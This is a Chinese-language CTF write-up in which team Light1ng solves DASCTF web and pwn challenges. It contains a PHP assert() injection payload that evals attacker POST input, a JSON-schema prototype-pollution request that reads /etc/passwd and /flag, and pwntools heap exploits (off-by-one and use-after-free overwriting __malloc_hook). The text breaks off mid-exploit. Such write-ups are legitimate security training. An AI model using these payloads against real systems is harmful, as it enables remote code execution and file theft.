Light1ng战队
一、战队信息
- 名称:Light1ng
- 排名:16
二、解题情况
进不去平台了,没法截图了
三、解题过程
Web
1.ezphp
ezphp
在关于里看到个Git,所以考虑存在git泄露
index.php里的php代码
<?php
if (isset($_GET['link_page'])) {
$link_page = $_GET['link_page'];
} else {
$link_page = "home";
}
$page_file = "pages/" . $link_page . ".php";
$safe_check1 = "strpos('$page_file', '..') === false";
assert($safe_check1) or die("no no no!");
// safe!
$safe_check2 = "file_exists('$page_file')";
assert($safe_check2) or die("no this file!");
?>
由于assert会进行命令执行,且$link_page参数可控,所以此处存在rce
构造闭合:
?link_page=flag.php', '..') === true|eval($_POST['yy']);//
POST传参:
yy=system('ls /');
执行成功,蚁剑连接:
在pages目录下拿到flag
DASCTF{af5ff99c7f98d528e711acc42fd6b906}
2.Looking for treasure
打开源码 有提示。
下载到源码 审计。
有一处
这里读取了p文件,如果能控制p的值就能实现文件读取。
这个content和req.body肯定是不相同的不用管它 ,所以p的内容最后会在报错信息的content里发出
看看p是怎么来的
config.path给p赋值。所以得想办法控制path的值。
源码里看到
看到这个想到json-schema原型链污染
payload
{
"$schema":{
"type":"object","properties":{
"__proto__":{
"type":"object","properties":{
"path":{
"type":"string","default":"/etc/passwd"}}}}}}
成功读到了/etc/passwd的内容,猜测flag在根目录,直接读/flag
{
"$schema":{
"type":"object","properties":{
"__proto__":{
"type":"object","properties":{
"path":{
"type":"string","default":"/flag"}}}}}}
数据包
POST /validated HTTP/1.1
Host: 26db192b-6f66-42c2-b783-cbe5f58cbd88.zzctf.dasctf.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 132
Origin: http://26db192b-6f66-42c2-b783-cbe5f58cbd88.zzctf.dasctf.com
Connection: close
Referer: http://26db192b-6f66-42c2-b783-cbe5f58cbd88.zzctf.dasctf.com/
Upgrade-Insecure-Requests: 1
{"$schema":{"type":"object","properties":{"__proto__":{"type":"object","properties":{"path":{"type":"string","default":"/flag"}}}}}}
DASCTF{5117143e660f592adc982dd96d2c3f17}
PWN
1.null
正常的菜单堆题,off-by-one漏洞,我没可以看见edit和add中都有read_input()函数,而漏洞点就在这个read_input()函数中
可以看见a2+1多读了一个字节我们可以利用这个漏洞来改写chunk的大小造成堆块的重叠。
Exp:
from pwn import *
#io=process('./null')
io=remote('82.157.5.28',50404)
elf=ELF('./null')
#libc=elf.libc
libc=ELF('./libc-2.23')
def choice(choice):
io.sendlineafter('choice :',str(choice))
def malloc(index,size,context):
choice(1)
io.sendlineafter('Index:',str(index))
io.sendlineafter('Size of Heap : ',str(size))
io.sendafter('Content?:',context)
def free(index):
choice(2)
io.sendlineafter('Index:',str(index))
def edit(index,context):
choice(3)
io.sendlineafter('Index:',str(index))
io.sendafter('Content?:',context)
def view(index):
choice(4)
io.sendlineafter('Index :',str(index))
def pwn():
malloc(0,0x18,'0\n')
malloc(1,0x78,'1\n')
malloc(2,0x68,'2\n')
malloc(3,0x68,'3\n')
malloc(4,0x88,'4\n')
edit(0,'0'*0x18+p8(0xf1))
free(1)
malloc(1,0x78,'\n')
view(2)
addr=u64(io.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
mallochook=addr-0x68
libcbase=mallochook-libc.symbols['__malloc_hook']
onegadget=[0x45226,0x4527a,0xf03a4,0xf1247]
malloc(5,0x68,'5\n')
free(5)
edit(2,p64(mallochook-0x23)+'\n')
malloc(6,0x68,'6\n')
malloc(7,0x68,'7'*0x13+p64(onegadget[3]+libcbase))#malloc_hook
io.sendlineafter('choice :','1')
io.sendlineafter('Index:','8')
io.sendlineafter('Size of Heap : ',str(0x18))
io.interactive()
pwn()
2.uaf
正常的菜单题
漏洞点在,free后指针没有置0,造成uaf漏洞,直接freechunk泄露libc,打malloc_hook
Exp:
from pwn import *
sh=remote('82.157.5.28',51402)
context.log_level='debug'
elf=ELF('./uaf_pwn')
libc=elf.libc
def exp():
def add(size):
sh.sendlineafter(">","1")
sh.sendlineafter("size>",str(size))
def dele(idx):
sh.sendlineafter(">","2")
sh.sendlineafter("index>",str(idx))
def